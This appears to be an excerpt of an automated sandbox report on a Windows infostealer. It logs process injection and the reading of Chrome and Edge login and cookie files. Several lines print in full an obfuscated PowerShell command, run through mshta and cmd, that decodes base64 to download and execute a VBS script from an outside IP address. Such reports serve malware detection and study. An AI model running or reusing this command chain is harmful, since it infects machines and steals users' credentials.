Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtQueryAttributesFile: Direct from: 0x77462E6C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtTerminateThread: Direct from: 0x77462FCC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe NtOpenKeyEx: Direct from: 0x77462B9C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: NULL target: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe protection: read write
Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe Thread register set: target process: 7908
Source: C:\Windows\SysWOW64\msinfo32.exe Thread APC queued: target process: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: FFF008
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
Source: C:\Windows\SysWOW64\msinfo32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $familial = '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';$monophthongs = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($familial));invoke-expression $monophthongs
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"Jump to behavior
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
